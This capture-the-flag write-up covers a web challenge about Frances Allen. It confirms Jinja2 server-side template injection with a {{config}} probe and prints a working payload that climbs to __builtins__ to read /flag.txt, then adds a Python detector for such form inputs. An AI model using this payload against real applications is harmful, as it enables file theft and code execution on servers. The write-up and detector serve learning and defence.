Frances Allen

Frances Elizabeth Allen

Frances Elizabeth Allen (August 4, 1932 – August 4, 2020) was an American computer scientist and pioneer in the field of optimizing compilers. Allen was the first woman to become an IBM Fellow, and in 2006 became the first woman to win the Turing Award. Her achievements include seminal work in compilers, program optimization, and parallelization. She worked for IBM from 1957 to 2002 and subsequently was a Fellow Emerita. - Wikipedia Entry

Description

Chal: Build your best attack against this webapp and inspire the first woman to win the Turing Award

Alternate (Better) Link: Webapp

Author: TJ

Solution


The application lets us Nominate A Cyber Heroine. 2 things quickly came to my mind: 1. SSTI and 2. Python Application.


Wappalyzer confirms that the application runs on Python; SSTI is confirmed by using {{config}} (Jinja2 syntax).

Time to visit good old HackTricks: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

Using the RCE file read payload, let's try to read the flag file.

{{ request.__class__._load_form_data.__globals__.__builtins__.open("/flag.txt").read() }}

Nomination received for: Test with bio:chctf{th3re_W4s_n3v3r_a_d0ubt_th4t_1t_w4s_1mp0rt4nt}
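
From the defending side, both the {{config}} probe and the file-read payload above stand out in form submissions. The following is an added example, not part of the original write-up or the challenge's code: it classifies URL-encoded form fields by whether they carry Jinja2 delimiters, template context objects, or dunder attribute chains. The field names name and bio and the sample request bodies are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Jinja2 delimiters: {{ expression }} and {% statement %}
TEMPLATE_EXPR = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.DOTALL)
# Dunder attribute names (__class__, __globals__, __builtins__, ...)
DUNDER = re.compile(r"__\w+?__")
# Template context objects referenced in this write-up
CONTEXT_OBJ = re.compile(r"\b(?:config|request)\b")


def classify(value):
    """Return 'clean', 'expression', 'probe' or 'traversal' for one field value."""
    bodies = [a or b for a, b in TEMPLATE_EXPR.findall(value)]
    if not bodies:
        return "clean"  # no template delimiters at all
    if any(DUNDER.search(b) for b in bodies):
        return "traversal"  # object-graph walk towards builtins
    if any(CONTEXT_OBJ.search(b) for b in bodies):
        return "probe"  # dumps a context object such as config
    return "expression"  # template syntax, nothing more specific


def scan_form(body):
    """Decode a URL-encoded form body and list (field, verdict) for suspicious fields."""
    findings = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        verdict = classify(value)
        if verdict != "clean":
            findings.append((field, verdict))
    return findings


# Constructed sample request bodies (field names are assumptions).
SAMPLES = [
    urlencode({"name": "Test", "bio": "Pioneer of optimizing compilers"}),
    urlencode({"name": "Test", "bio": "Uses {braces} in prose"}),
    urlencode({"name": "Test", "bio": "{{config}}"}),
    urlencode({"name": "Test", "bio": '{{ request.__class__._load_form_data'
               '.__globals__.__builtins__.open("/flag.txt").read() }}'}),
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_form(body) or "clean", "<-", body[:60])
```

A match here is a signal for alerting or triage; the root cause remains user input being rendered as template source rather than passed to the template as data.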
